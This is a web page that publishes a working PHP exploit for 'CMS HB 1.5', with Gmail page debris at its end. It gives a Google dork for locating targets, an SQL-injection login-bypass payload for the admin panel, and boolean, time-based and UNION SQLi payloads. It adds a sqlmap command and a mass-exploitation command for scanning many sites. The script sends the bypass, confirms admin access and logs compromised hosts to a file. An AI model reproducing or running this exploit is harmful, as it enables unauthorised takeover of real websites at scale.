facebook facebook twitter rss

Exploit XPL 0day CMS HB 1.5

Author: Cleiton Pinheiro , Published: 15-05-2015
<?php

/*
[+] Discoverer Author: M3t4tr0n
[+] FACEBOOK: https://www.facebook.com/M3T4TR0N
[+] EMAIL: rammstain960@gmail.com
[*] Thanks M3t4tr0n
[*] Neither war between hackers, nor peace for the system.
------------------------------------------------------------------------------

# SCRIPT by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ]
# EXPLOIT NAME: XPL 0day CMS HB 1.5 / INURL BRASIL
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Email: inurlbr@gmail.com
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
------------------------------------------------------------------------------

# FAILURE REPORTED: 15/maio/2015

# ADMINISTRATIVE ACCESS PANEL

# Vendor: http://www.hbwebecia.com.br/
# CMS HB 1.5

# Google Dork: inurl:base.php?pagina

# FILE VULN /admin/logar.phpxx
# POC: (POST)http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar

# FILE VULN /base.php
# POC: (GET)http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)

# Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe

# Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC

# Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--

# USE SQLMAP:
./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1' //
--dbs --random-agent --level 3 --risk 2 --proxy 'http://localhost:8118' //
--dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only //
--flush-session --batch

# EXECUTE: php xpl.php -t http://target.us

# FILE_OUTPUT : HB.txt

# EXPLOIT MASS USE SCANNER INURLBR
php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'
More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
------------------------------------------------------------------------------


*/
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

$op_ = getopt('f:t:', array('help::'));
echo "[+] [Exploit]: XPL 0day CMS HB 1.5 / INURL BRASIL \n";
$menu = "
-t : SET TARGET.
Execute:
php xpl.php -t target
php xpl.php -t target/path
\n";
echo isset($op_['help']) ? exit($menu) : NULL;
$params = array(
'host' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : exit("\n[x] [ERRO] DEFINE TARGET!\n"),
'line' => "-----------------------------------------------------------------------------------------------"
);

function __plus() {
ob_flush();
flush();
}

function not_isnull_empty($valor = NULL) {
RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}

function __request($params) {
$objcurl = curl_init();
curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/admin/logar.php");
curl_setopt($objcurl, CURLOPT_USERAGENT, "Mozilla/" . rand(1, 50) . ".0 (compatible; MSIE " . rand(1, 50) . "." . rand(1, 50) . "1; Windows NT " . rand(1, 50) . ".0)");
curl_setopt($objcurl, CURLOPT_POST, 1);
curl_setopt($objcurl, CURLOPT_TIMEOUT, 5);
curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('login' => "'=' 'or'", 'senha' => "'=' 'or'", 'Submit3' => 'Entrar'));
curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($objcurl, CURLOPT_FRESH_CONNECT, 1);

$info[0] = curl_exec($objcurl);
$info[1] = curl_getinfo($objcurl);
$info[2] = curl_error($objcurl);

curl_close($objcurl) . __plus();
unset($objcurl);

return $info;
}

print "\n" . date("h:m:s") . " [+][XPL SEND POST]: array('login' => \"'=' 'or'\", 'senha' => \"'=' 'or'\", 'Submit3' => 'Entrar')";

$_h = __request($params);

if (strstr($_h[1]['redirect_url'], '/admin/index.php')) {

print "\n" . date("h:m:s") . " [+][RETURN]:: ACCESS GRANTED!";
print "\n" . date("h:m:s") . " [+][URL]:: {$params['host']}/admin/index.php [ OK ]";
print "\n" . date("h:m:s") . " [+][LOGIN]:: '=' 'or'";
print "\n" . date("h:m:s") . " [+][SENHA]:: '=' 'or' \n{$params['line']}\n";
file_put_contents("HB.txt", "{$params['host']} - LOGIN: '=' 'or' / SENHA: '=' 'or'\n\n", FILE_APPEND);
__plus();
} else {

print "\n" . date("h:m:s") . " [x][NOT VULN] " . (isset($_h[2]) && !empty($_h[2]) ? " - [DETAILS]::{$_h[2]}" : NULL) . "\n{$params['line']}\n\n";
}

Click here to Reply, Reply to all or Forward
0.03 GB (0%) of 15 GB used
Manage
Terms - Privacy
Last account activity: 3 days ago
Details


People (3)
INURL Brasil's profile photo
INURL Brasil

Like us on Facebook :